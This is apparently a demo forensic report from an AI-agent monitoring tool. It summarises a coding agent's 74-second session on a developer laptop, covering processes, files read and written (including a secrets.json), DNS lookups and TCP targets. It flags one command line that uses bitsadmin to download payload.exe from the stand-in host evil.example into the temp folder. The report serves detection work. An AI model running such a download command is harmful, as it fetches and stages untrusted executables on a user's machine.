Back to session

Sigtrace AI.Trace · Forensic session report

Session `dev-laptop-bill-high-109290803`

Agent cline on host dev-laptop-bill · 1m14s

Session ID: dev-laptop-bill-high-109290803
Agent: cline
Host: dev-laptop-bill
First seen: 2026-04-22 17:19:55Z
Last seen: 2026-04-22 17:21:09Z
Duration: 1m14s
Events captured: 32
Posted at: 2026-04-22 22:14:22Z
Report generated: 2026-04-23 10:25:41Z
Report ID: 17dd38bf373f694f
Schema version: 1
Live dashboard: https://demo.sigtrace.ai/ui/sessions/dev-laptop-bill-high-109290803

Verdict Low 1 suspicious cmdline 2 shell spawns 2 network targets

Sensitive path hits · 0

No sensitive path hits.

Suspicious host queries · 0

No suspicious host queries.

Suspicious command lines · 1

Cmdline	Reason	Process	Pid	When
`cmd.exe /c bitsadmin /transfer job http://evil.example/payload.exe %TEMP%\p.exe`	bitsadmin transfer	`C:\Program Files\Git\usr\bin\bash.exe`	2044	`2026-04-22T17:21:09.685563043Z`

Registry persistence · 0

No registry persistence writes.

Flagged image loads · 0

No flagged image loads.

Top processes · 3

Image	Count
`C:\Program Files\Git\cmd\git.exe`	1
`C:\Program Files\Git\usr\bin\bash.exe`	1
`C:\Windows\System32\cmd.exe`	1

Top file opens · 5

Path	Count
`C:\work\pipeline\pipeline\stages\ingest.py`	5
`C:\work\pipeline\pipeline\stages\transform.py`	3
`C:\work\pipeline\pyproject.toml`	3
`C:\work\myapp\secrets.json`	2
`C:\work\pipeline\tests\test_ingest.py`	2

File writes · 2

Path	Count
`C:\work\pipeline\Makefile`	1
`C:\work\pipeline\tests\test_ingest.py`	1

File renames / deletes

No renames or deletes.

DNS queries · 6

Query	Count
`api.anthropic.com`	1
`cdn.jsdelivr.net`	1
`deb.debian.org`	1
`proxy.golang.org`	1
`raw.githubusercontent.com`	1
`registry.npmjs.org`	1

TCP targets · 2

Target	Count
`151.101.0.223:443`	1
`34.107.221.82:443`	1